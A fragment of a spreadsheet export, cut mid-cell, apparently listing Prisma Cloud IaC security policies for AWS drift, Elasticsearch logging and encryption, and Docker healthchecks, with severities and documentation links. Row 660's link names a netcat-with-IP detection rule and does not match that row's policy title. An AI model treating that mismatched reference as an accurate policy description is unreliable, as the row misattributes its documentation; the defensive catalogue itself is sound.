ws-sqs-queue,aws-sqs-queue-policy,aws-ssm-activation,aws-ssm-association,aws-ssm-document,aws-ssm-maintenance-window,aws-ssm-maintenance-window-target,aws-ssm-maintenance-window-task,aws-ssm-parameter,aws-ssm-patch-baseline,aws-ssm-patch-group,aws-ssm-resource-data-sync,aws-storagegateway-cache,aws-storagegateway-cached-iscsi-volume,aws-storagegateway-gateway,aws-storagegateway-nfs-file-share,aws-storagegateway-smb-file-share,aws-storagegateway-upload-buffer,aws-storagegateway-working-storage,aws-subnet,aws-swf-domain,aws-transfer-server,aws-transfer-ssh-key,aws-transfer-user,aws-volume-attachment,aws-vpc,aws-vpc-dhcp-options,aws-vpc-dhcp-options-association,aws-vpc-endpoint,aws-vpc-endpoint-connection-notification,aws-vpc-endpoint-route-table-association,aws-vpc-endpoint-service,aws-vpc-endpoint-service-allowed-principal,aws-vpc-endpoint-subnet-association,aws-vpc-ipv4-cidr-block-association,aws-vpc-peering-connection,aws-vpc-peering-connection-accepter,aws-vpc-peering-connection-options,aws-vpn-connection,aws-vpn-connection-route,aws-vpn-gateway,aws-vpn-gateway-attachment,aws-vpn-gateway-route-propagation,aws-waf-byte-match-set,aws-waf-geo-match-set,aws-waf-ipset,aws-waf-rate-based-rule,aws-waf-regex-match-set,aws-waf-regex-pattern-set,aws-waf-rule,aws-waf-rule-group,aws-waf-size-constraint-set,aws-waf-sql-injection-match-set,aws-waf-web-acl,aws-waf-xss-match-set,aws-wafregional-byte-match-set,aws-wafregional-geo-match-set,aws-wafregional-ipset,aws-wafregional-rate-based-rule,aws-wafregional-regex-match-set,aws-wafregional-regex-pattern-set,aws-wafregional-rule,aws-wafregional-rule-group,aws-wafregional-size-constraint-set,aws-wafregional-sql-injection-match-set,aws-wafregional-web-acl,aws-wafregional-web-acl-association,aws-wafregional-xss-match-set,aws-wafv2-ip-set,aws-wafv2-regex-pattern-set,aws-wafv2-rule-group,aws-wafv2-web-acl,aws-wafv2-web-acl-association,aws-wafv2-web-acl-logging-configuration,aws-worklink-fleet,aws-worklink-website-certificate-authority-association,aws-workspaces-directory,aws-workspaces-ip-group,aws-workspaces-workspace,aws-xray-sampling-rule</t>
        </is>
      </c>
      <c r="W656" t="inlineStr">
        <is>
          <t>Ensure provisioned resources are not manually modified</t>
        </is>
      </c>
      <c r="X656" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-provisioned-resources-are-not-manually-modified</t>
        </is>
      </c>
      <c r="Y656" t="inlineStr"/>
      <c r="Z656" t="inlineStr">
        <is>
          <t>{"category":"Drift","resourceTypes":["aws_accessanalyzer_analyzer","aws_acm_certificate","aws_acm_certificate_validation","aws_acmpca_certificate_authority","aws_ami","aws_ami_copy","aws_ami_from_instance","aws_ami_launch_permission","aws_api_gateway_account","aws_api_gateway_api_key","aws_api_gateway_authorizer","aws_api_gateway_base_path_mapping","aws_api_gateway_client_certificate","aws_api_gateway_deployment","aws_api_gateway_documentation_part","aws_api_gateway_documentation_version","aws_api_gateway_domain_name","aws_api_gateway_gateway_response","aws_api_gateway_integration","aws_api_gateway_integration_response","aws_api_gateway_method","aws_api_gateway_method_response","aws_api_gateway_method_settings","aws_api_gateway_model","aws_api_gateway_request_validator","aws_api_gateway_resource","aws_api_gateway_rest_api","aws_api_gateway_stage","aws_api_gateway_usage_plan","aws_api_gateway_usage_plan_key","aws_api_gateway_vpc_link","aws_apigatewayv2_api","aws_apigatewayv2_api_mapping","aws_apigatewayv2_authorizer","aws_apigatewayv2_deployment","aws_apigatewayv2_domain_name","aws_apigatewayv2_integration","aws_apigatewayv2_integration_response","aws_apigatewayv2_model","aws_apigatewayv2_route","aws_apigatewayv2_route_response","aws_apigatewayv2_stage","aws_apigatewayv2_vpc_link","aws_app_cookie_stickiness_policy","aws_appautoscaling_policy","aws_appautoscaling_scheduled_action","aws_appautoscaling_target","aws_appmesh_mesh","aws_appmesh_route","aws_appmesh_virtual_node","aws_appmesh_virtual_router","aws_appmesh_virtual_service","aws_appsync_api_key","aws_appsync_datasource","aws_appsync_function","aws_appsync_graphql_api","aws_appsync_resolver","aws_athena_database","aws_athena_named_query","aws_athena_workgroup","aws_autoscaling_attachment","aws_autoscaling_group","aws_autoscaling_lifecycle_hook","aws_autoscaling_notification","aws_autoscaling_policy","aws_autoscaling_schedule","aws_backup_plan","aws_backup_selection","aws_backup_vault","aws_batch_compute_environment","aws_batch_job_definition","aws_batch_job_queue","aws_budgets_budget","aws_cloud9_environment_ec2","aws_cloudformation_stack","aws_cloudformation_stack_set","aws_cloudformation_stack_set_instance","aws_cloudfront_distribution","aws_cloudfront_origin_access_identity","aws_cloudfront_public_key","aws_cloudhsm_v2_cluster","aws_cloudhsm_v2_hsm","aws_cloudtrail","aws_cloudwatch_dashboard","aws_cloudwatch_event_permission","aws_cloudwatch_event_rule","aws_cloudwatch_event_target","aws_cloudwatch_log_destination","aws_cloudwatch_log_destination_policy","aws_cloudwatch_log_group","aws_cloudwatch_log_metric_filter","aws_cloudwatch_log_resource_policy","aws_cloudwatch_log_stream","aws_cloudwatch_log_subscription_filter","aws_cloudwatch_metric_alarm","aws_codebuild_project","aws_codebuild_source_credential","aws_codebuild_webhook","aws_codecommit_repository","aws_codecommit_trigger","aws_codedeploy_app","aws_codedeploy_deployment_config","aws_codedeploy_deployment_group","aws_codepipeline","aws_codepipeline_webhook","aws_codestarnotifications_notification_rule","aws_cognito_identity_pool","aws_cognito_identity_pool_roles_attachment","aws_cognito_identity_provider","aws_cognito_resource_server","aws_cognito_user_group","aws_cognito_user_pool","aws_cognito_user_pool_client","aws_cognito_user_pool_domain","aws_config_aggregate_authorization","aws_config_config_rule","aws_config_configuration_aggregator","aws_config_configuration_recorder","aws_config_configuration_recorder_status","aws_config_delivery_channel","aws_config_organization_custom_rule","aws_config_organization_managed_rule","aws_cur_report_definition","aws_customer_gateway","aws_datapipeline_pipeline","aws_datasync_agent","aws_datasync_location_efs","aws_datasync_location_nfs","aws_datasync_location_s3","aws_datasync_location_smb","aws_datasync_task","aws_dax_cluster","aws_dax_parameter_group","aws_dax_subnet_group","aws_db_cluster_snapshot","aws_db_event_subscription","aws_db_instance","aws_db_instance_role_association","aws_db_option_group","aws_db_parameter_group","aws_db_security_group","aws_db_snapshot","aws_db_subnet_group","aws_default_network_acl","aws_default_route_table","aws_default_security_group","aws_default_subnet","aws_default_vpc","aws_default_vpc_dhcp_options","aws_devicefarm_project","aws_directory_service_conditional_forwarder","aws_directory_service_directory","aws_directory_service_log_subscription","aws_dlm_lifecycle_policy","aws_dms_certificate","aws_dms_endpoint","aws_dms_event_subscription","aws_dms_replication_instance","aws_dms_replication_subnet_group","aws_dms_replication_task","aws_docdb_cluster","aws_docdb_cluster_instance","aws_docdb_cluster_parameter_group","aws_docdb_cluster_snapshot","aws_docdb_subnet_group","aws_dx_bgp_peer","aws_dx_connection","aws_dx_connection_association","aws_dx_gateway","aws_dx_gateway_association","aws_dx_gateway_association_proposal","aws_dx_hosted_private_virtual_interface","aws_dx_hosted_private_virtual_interface_accepter","aws_dx_hosted_public_virtual_interface","aws_dx_hosted_public_virtual_interface_accepter","aws_dx_hosted_transit_virtual_interface","aws_dx_hosted_transit_virtual_interface_accepter","aws_dx_lag","aws_dx_private_virtual_interface","aws_dx_public_virtual_interface","aws_dx_transit_virtual_interface","aws_dynamodb_global_table","aws_dynamodb_table","aws_dynamodb_table_item","aws_ebs_default_kms_key","aws_ebs_encryption_by_default","aws_ebs_snapshot","aws_ebs_snapshot_copy","aws_ebs_volume","aws_ec2_availability_zone_group","aws_ec2_capacity_reservation","aws_ec2_client_vpn_authorization_rule","aws_ec2_client_vpn_endpoint","aws_ec2_client_vpn_network_association","aws_ec2_client_vpn_route","aws_ec2_fleet","aws_ec2_local_gateway_route","aws_ec2_local_gateway_route_table_vpc_association","aws_ec2_tag","aws_ec2_traffic_mirror_filter","aws_ec2_traffic_mirror_filter_rule","aws_ec2_traffic_mirror_session","aws_ec2_traffic_mirror_target","aws_ec2_transit_gateway","aws_ec2_transit_gateway_peering_attachment","aws_ec2_transit_gateway_peering_attachment_accepter","aws_ec2_transit_gateway_route","aws_ec2_transit_gateway_route_table","aws_ec2_transit_gateway_route_table_association","aws_ec2_transit_gateway_route_table_propagation","aws_ec2_transit_gateway_vpc_attachment","aws_ec2_transit_gateway_vpc_attachment_accepter","aws_ecr_lifecycle_policy","aws_ecr_repository","aws_ecr_repository_policy","aws_ecs_capacity_provider","aws_ecs_cluster","aws_ecs_service","aws_ecs_task_definition","aws_efs_access_point","aws_efs_file_system","aws_efs_file_system_policy","aws_efs_mount_target","aws_egress_only_internet_gateway","aws_eip","aws_eip_association","aws_eks_cluster","aws_eks_fargate_profile","aws_eks_node_group","aws_elastic_beanstalk_application","aws_elastic_beanstalk_application_version","aws_elastic_beanstalk_configuration_template","aws_elastic_beanstalk_environment","aws_elasticache_cluster","aws_elasticache_parameter_group","aws_elasticache_replication_group","aws_elasticache_security_group","aws_elasticache_subnet_group","aws_elasticsearch_domain","aws_elasticsearch_domain_policy","aws_elastictranscoder_pipeline","aws_elastictranscoder_preset","aws_elb","aws_elb_attachment","aws_emr_cluster","aws_emr_instance_group","aws_emr_security_configuration","aws_flow_log","aws_fms_admin_account","aws_fsx_lustre_file_system","aws_fsx_windows_file_system","aws_gamelift_alias","aws_gamelift_build","aws_gamelift_fleet","aws_gamelift_game_session_queue","aws_glacier_vault","aws_glacier_vault_lock","aws_globalaccelerator_accelerator","aws_globalaccelerator_endpoint_group","aws_globalaccelerator_listener","aws_glue_catalog_database","aws_glue_catalog_table","aws_glue_classifier","aws_glue_connection","aws_glue_crawler","aws_glue_job","aws_glue_security_configuration","aws_glue_trigger","aws_glue_workflow","aws_guardduty_detector","aws_guardduty_invite_accepter","aws_guardduty_ipset","aws_guardduty_member","aws_guardduty_organization_admin_account","aws_guardduty_organization_configuration","aws_guardduty_threatintelset","aws_iam_access_key","aws_iam_account_alias","aws_iam_account_password_policy","aws_iam_group","aws_iam_group_membership","aws_iam_group_policy","aws_iam_group_policy_attachment","aws_iam_instance_profile","aws_iam_openid_connect_provider","aws_iam_policy","aws_iam_policy_attachment","aws_iam_role","aws_iam_role_policy","aws_iam_role_policy_attachment","aws_iam_saml_provider","aws_iam_server_certificate","aws_iam_service_linked_role","aws_iam_user","aws_iam_user_group_membership","aws_iam_user_login_profile","aws_iam_user_policy","aws_iam_user_policy_attachment","aws_iam_user_ssh_key","aws_inspector_assessment_target","aws_inspector_assessment_template","aws_inspector_resource_group","aws_instance","aws_internet_gateway","aws_iot_certificate","aws_iot_policy","aws_iot_policy_attachment","aws_iot_role_alias","aws_iot_thing","aws_iot_thing_principal_attachment","aws_iot_thing_type","aws_iot_topic_rule","aws_key_pair","aws_kinesis_analytics_application","aws_kinesis_firehose_delivery_stream","aws_kinesis_stream","aws_kinesis_video_stream","aws_kms_alias","aws_kms_ciphertext","aws_kms_external_key","aws_kms_grant","aws_kms_key","aws_lambda_alias","aws_lambda_event_source_mapping","aws_lambda_function","aws_lambda_function_event_invoke_config","aws_lambda_layer_version","aws_lambda_permission","aws_lambda_provisioned_concurrency_config","aws_launch_configuration","aws_launch_template","aws_lb","aws_lb_cookie_stickiness_policy","aws_lb_listener","aws_lb_listener_certificate","aws_lb_listener_rule","aws_lb_ssl_negotiation_policy","aws_lb_target_group","aws_lb_target_group_attachment","aws_licensemanager_association","aws_licensemanager_license_configuration","aws_lightsail_domain","aws_lightsail_instance","aws_lightsail_key_pair","aws_lightsail_static_ip","aws_lightsail_static_ip_attachment","aws_load_balancer_backend_server_policy","aws_load_balancer_listener_policy","aws_load_balancer_policy","aws_macie_member_account_association","aws_macie_s3_bucket_association","aws_main_route_table_association","aws_media_convert_queue","aws_media_package_channel","aws_media_store_container","aws_media_store_container_policy","aws_mq_broker","aws_mq_configuration","aws_msk_cluster","aws_msk_configuration","aws_nat_gateway","aws_neptune_cluster","aws_neptune_cluster_instance","aws_neptune_cluster_parameter_group","aws_neptune_cluster_snapshot","aws_neptune_event_subscription","aws_neptune_parameter_group","aws_neptune_subnet_group","aws_network_acl","aws_network_acl_rule","aws_network_interface","aws_network_interface_attachment","aws_network_interface_sg_attachment","aws_opsworks_application","aws_opsworks_custom_layer","aws_opsworks_ganglia_layer","aws_opsworks_haproxy_layer","aws_opsworks_instance","aws_opsworks_java_app_layer","aws_opsworks_memcached_layer","aws_opsworks_mysql_layer","aws_opsworks_nodejs_app_layer","aws_opsworks_permission","aws_opsworks_php_app_layer","aws_opsworks_rails_app_layer","aws_opsworks_rds_db_instance","aws_opsworks_stack","aws_opsworks_static_web_layer","aws_opsworks_user_profile","aws_organizations_account","aws_organizations_organization","aws_organizations_organizational_unit","aws_organizations_policy","aws_organizations_policy_attachment","aws_pinpoint_adm_channel","aws_pinpoint_apns_channel","aws_pinpoint_apns_sandbox_channel","aws_pinpoint_apns_voip_channel","aws_pinpoint_apns_voip_sandbox_channel","aws_pinpoint_app","aws_pinpoint_baidu_channel","aws_pinpoint_email_channel","aws_pinpoint_event_stream","aws_pinpoint_gcm_channel","aws_pinpoint_sms_channel","aws_placement_group","aws_proxy_protocol_policy","aws_qldb_ledger","aws_quicksight_group","aws_quicksight_user","aws_ram_principal_association","aws_ram_resource_association","aws_ram_resource_share","aws_ram_resource_share_accepter","aws_rds_cluster","aws_rds_cluster_endpoint","aws_rds_cluster_instance","aws_rds_cluster_parameter_group","aws_rds_global_cluster","aws_redshift_cluster","aws_redshift_event_subscription","aws_redshift_parameter_group","aws_redshift_security_group","aws_redshift_snapshot_copy_grant","aws_redshift_snapshot_schedule","aws_redshift_snapshot_schedule_association","aws_redshift_subnet_group","aws_resourcegroups_group","aws_route","aws_route53_delegation_set","aws_route53_health_check","aws_route53_query_log","aws_route53_record","aws_route53_resolver_endpoint","aws_route53_resolver_rule","aws_route53_resolver_rule_association","aws_route53_vpc_association_authorization","aws_route53_zone","aws_route53_zone_association","aws_route_table","aws_route_table_association","aws_s3_access_point","aws_s3_account_public_access_block","aws_s3_bucket","aws_s3_bucket_analytics_configuration","aws_s3_bucket_inventory","aws_s3_bucket_metric","aws_s3_bucket_notification","aws_s3_bucket_object","aws_s3_bucket_policy","aws_s3_bucket_public_access_block","aws_sagemaker_endpoint","aws_sagemaker_endpoint_configuration","aws_sagemaker_model","aws_sagemaker_notebook_instance","aws_sagemaker_notebook_instance_lifecycle_configuration","aws_secretsmanager_secret","aws_secretsmanager_secret_rotation","aws_secretsmanager_secret_version","aws_security_group","aws_security_group_rule","aws_securityhub_account","aws_securityhub_member","aws_securityhub_product_subscription","aws_securityhub_standards_subscription","aws_service_discovery_http_namespace","aws_service_discovery_private_dns_namespace","aws_service_discovery_public_dns_namespace","aws_service_discovery_service","aws_servicecatalog_portfolio","aws_servicequotas_service_quota","aws_ses_active_receipt_rule_set","aws_ses_configuration_set","aws_ses_domain_dkim","aws_ses_domain_identity","aws_ses_domain_identity_verification","aws_ses_domain_mail_from","aws_ses_email_identity","aws_ses_event_destination","aws_ses_identity_notification_topic","aws_ses_identity_policy","aws_ses_receipt_filter","aws_ses_receipt_rule","aws_ses_receipt_rule_set","aws_ses_template","aws_sfn_activity","aws_sfn_state_machine","aws_shield_protection","aws_simpledb_domain","aws_snapshot_create_volume_permission","aws_sns_platform_application","aws_sns_sms_preferences","aws_sns_topic","aws_sns_topic_policy","aws_sns_topic_subscription","aws_spot_datafeed_subscription","aws_spot_fleet_request","aws_spot_instance_request","aws_sqs_queue","aws_sqs_queue_policy","aws_ssm_activation","aws_ssm_association","aws_ssm_document","aws_ssm_maintenance_window","aws_ssm_maintenance_window_target","aws_ssm_maintenance_window_task","aws_ssm_parameter","aws_ssm_patch_baseline","aws_ssm_patch_group","aws_ssm_resource_data_sync","aws_storagegateway_cache","aws_storagegateway_cached_iscsi_volume","aws_storagegateway_gateway","aws_storagegateway_nfs_file_share","aws_storagegateway_smb_file_share","aws_storagegateway_upload_buffer","aws_storagegateway_working_storage","aws_subnet","aws_swf_domain","aws_transfer_server","aws_transfer_ssh_key","aws_transfer_user","aws_volume_attachment","aws_vpc","aws_vpc_dhcp_options","aws_vpc_dhcp_options_association","aws_vpc_endpoint","aws_vpc_endpoint_connection_notification","aws_vpc_endpoint_route_table_association","aws_vpc_endpoint_service","aws_vpc_endpoint_service_allowed_principal","aws_vpc_endpoint_subnet_association","aws_vpc_ipv4_cidr_block_association","aws_vpc_peering_connection","aws_vpc_peering_connection_accepter","aws_vpc_peering_connection_options","aws_vpn_connection","aws_vpn_connection_route","aws_vpn_gateway","aws_vpn_gateway_attachment","aws_vpn_gateway_route_propagation","aws_waf_byte_match_set","aws_waf_geo_match_set","aws_waf_ipset","aws_waf_rate_based_rule","aws_waf_regex_match_set","aws_waf_regex_pattern_set","aws_waf_rule","aws_waf_rule_group","aws_waf_size_constraint_set","aws_waf_sql_injection_match_set","aws_waf_web_acl","aws_waf_xss_match_set","aws_wafregional_byte_match_set","aws_wafregional_geo_match_set","aws_wafregional_ipset","aws_wafregional_rate_based_rule","aws_wafregional_regex_match_set","aws_wafregional_regex_pattern_set","aws_wafregional_rule","aws_wafregional_rule_group","aws_wafregional_size_constraint_set","aws_wafregional_sql_injection_match_set","aws_wafregional_web_acl","aws_wafregional_web_acl_association","aws_wafregional_xss_match_set","aws_wafv2_ip_set","aws_wafv2_regex_pattern_set","aws_wafv2_rule_group","aws_wafv2_web_acl","aws_wafv2_web_acl_association","aws_wafv2_web_acl_logging_configuration","aws_worklink_fleet","aws_worklink_website_certificate_authority_association","aws_workspaces_directory","aws_workspaces_ip_group","aws_workspaces_workspace","aws_xray_sampling_rule"]}</t>
        </is>
      </c>
      <c r="AA656" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB656" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC656" t="inlineStr">
        <is>
          <t>BC_AWS_DRIFT_1</t>
        </is>
      </c>
      <c r="AD656" t="b">
        <v>1</v>
      </c>
      <c r="AE656" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF656" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>708f1ba7-7d77-45a3-b932-823745ffaa89</t>
        </is>
      </c>
      <c r="AI656" t="inlineStr"/>
      <c r="AJ656" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK656" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" t="inlineStr"/>
      <c r="B657" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C657" s="2" t="inlineStr"/>
      <c r="D657" t="inlineStr"/>
      <c r="E657" t="inlineStr"/>
      <c r="F657" t="inlineStr"/>
      <c r="G657" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J657" t="inlineStr">
        <is>
          <t>IaC:Elasticsearch:aws-elasticsearch</t>
        </is>
      </c>
      <c r="K657" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain logging is not enabled</t>
        </is>
      </c>
      <c r="L657" t="inlineStr"/>
      <c r="M657" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N657" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O657" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P657" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q657" t="inlineStr"/>
      <c r="R657" t="inlineStr"/>
      <c r="S657" t="inlineStr"/>
      <c r="T657" t="b">
        <v>0</v>
      </c>
      <c r="U657" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V657" t="inlineStr">
        <is>
          <t>IaC:Elasticsearch:aws-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W657" t="inlineStr">
        <is>
          <t>Ensure Elasticsearch Domain Logging is enabled</t>
        </is>
      </c>
      <c r="X657" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/elastisearch-policies/elasticsearch-7</t>
        </is>
      </c>
      <c r="Y657" t="inlineStr"/>
      <c r="Z657" t="inlineStr">
        <is>
          <t>{"category":"Elasticsearch","resourceTypes":["aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA657" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB657" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC657" t="inlineStr">
        <is>
          <t>CKV_AWS_84</t>
        </is>
      </c>
      <c r="AD657" t="b">
        <v>1</v>
      </c>
      <c r="AE657" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF657" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>e1acdde6-67fc-4c86-b9f9-a22f87aef03b</t>
        </is>
      </c>
      <c r="AI657" t="inlineStr"/>
      <c r="AJ657" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK657" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" t="inlineStr"/>
      <c r="B658" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C658" s="2" t="inlineStr"/>
      <c r="D658" t="inlineStr"/>
      <c r="E658" t="inlineStr"/>
      <c r="F658" t="inlineStr"/>
      <c r="G658" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J658" t="inlineStr">
        <is>
          <t>IaC:Elasticsearch:aws-elasticsearch</t>
        </is>
      </c>
      <c r="K658" t="inlineStr">
        <is>
          <t>AWS Elasticsearch does not have node-to-node encryption enabled</t>
        </is>
      </c>
      <c r="L658" t="inlineStr"/>
      <c r="M658" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N658" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O658" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P658" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q658" t="inlineStr"/>
      <c r="R658" t="inlineStr"/>
      <c r="S658" t="inlineStr"/>
      <c r="T658" t="b">
        <v>0</v>
      </c>
      <c r="U658" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V658" t="inlineStr">
        <is>
          <t>IaC:Elasticsearch:aws-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W658" t="inlineStr">
        <is>
          <t>Ensure all Elasticsearch has node-to-node encryption enabled</t>
        </is>
      </c>
      <c r="X658" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/elastisearch-policies/elasticsearch-5</t>
        </is>
      </c>
      <c r="Y658" t="inlineStr"/>
      <c r="Z658" t="inlineStr">
        <is>
          <t>{"category":"Elasticsearch","resourceTypes":["aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA658" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB658" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC658" t="inlineStr">
        <is>
          <t>CKV_AWS_6</t>
        </is>
      </c>
      <c r="AD658" t="b">
        <v>1</v>
      </c>
      <c r="AE658" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF658" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>f978f4db-d9b9-41df-bf4f-d8ce52019a9c</t>
        </is>
      </c>
      <c r="AI658" t="inlineStr"/>
      <c r="AJ658" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK658" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" t="inlineStr"/>
      <c r="B659" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C659" s="2" t="inlineStr"/>
      <c r="D659" t="inlineStr"/>
      <c r="E659" t="inlineStr"/>
      <c r="F659" t="inlineStr"/>
      <c r="G659" t="b">
        <v>1</v>
      </c>
      <c r="H6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59" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J659" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="K659" t="inlineStr">
        <is>
          <t>Healthcheck instructions have not been added to container images</t>
        </is>
      </c>
      <c r="L659" t="inlineStr"/>
      <c r="M659" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N659" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O659" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P659" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q659" t="inlineStr"/>
      <c r="R659" t="inlineStr"/>
      <c r="S659" t="inlineStr"/>
      <c r="T659" t="b">
        <v>0</v>
      </c>
      <c r="U659" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V659" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="W659" t="inlineStr">
        <is>
          <t>Ensure that HEALTHCHECK instructions have been added to container images</t>
        </is>
      </c>
      <c r="X659" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images</t>
        </is>
      </c>
      <c r="Y659" t="inlineStr"/>
      <c r="Z659" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA659" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB659" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC659" t="inlineStr">
        <is>
          <t>CKV_DOCKER_2</t>
        </is>
      </c>
      <c r="AD659" t="b">
        <v>1</v>
      </c>
      <c r="AE659" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF659" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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59" t="inlineStr">
        <is>
          <t>2457c548-1ac6-4f6e-a6e5-d6a1ad318720</t>
        </is>
      </c>
      <c r="AI659" t="inlineStr"/>
      <c r="AJ659" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK659" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" t="inlineStr"/>
      <c r="B660" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C660" s="2" t="inlineStr"/>
      <c r="D660" t="inlineStr"/>
      <c r="E660" t="inlineStr"/>
      <c r="F660" t="inlineStr"/>
      <c r="G660" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J660" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="K660" t="inlineStr">
        <is>
          <t>Buildtime resource is not deployed to AWS runtime environments</t>
        </is>
      </c>
      <c r="L660" t="inlineStr"/>
      <c r="M660" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N660" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O660" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P660" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q660" t="inlineStr"/>
      <c r="R660" t="inlineStr"/>
      <c r="S660" t="inlineStr"/>
      <c r="T660" t="b">
        <v>0</v>
      </c>
      <c r="U660" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V660" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="W660" t="inlineStr">
        <is>
          <t>Ensure all buildtime resources are deployed to cloud runtime environments</t>
        </is>
      </c>
      <c r="X660" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.bridgecrew.io/docs/suspicious-use-of-netcat-with-ip-address-1</t>
        </is>
      </c>
      <c r="Y660" t="inlineStr"/>
      <c r="Z660" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA660" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB660" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC660" t="inlineStr">
        <is>
          <t>BC_AWS_CODETOCLOUD_2</t>
        </is>
      </c>
      <c r="AD660" t="b">
        <v>1</v>
      </c>
      <c r="AE660" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF660" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
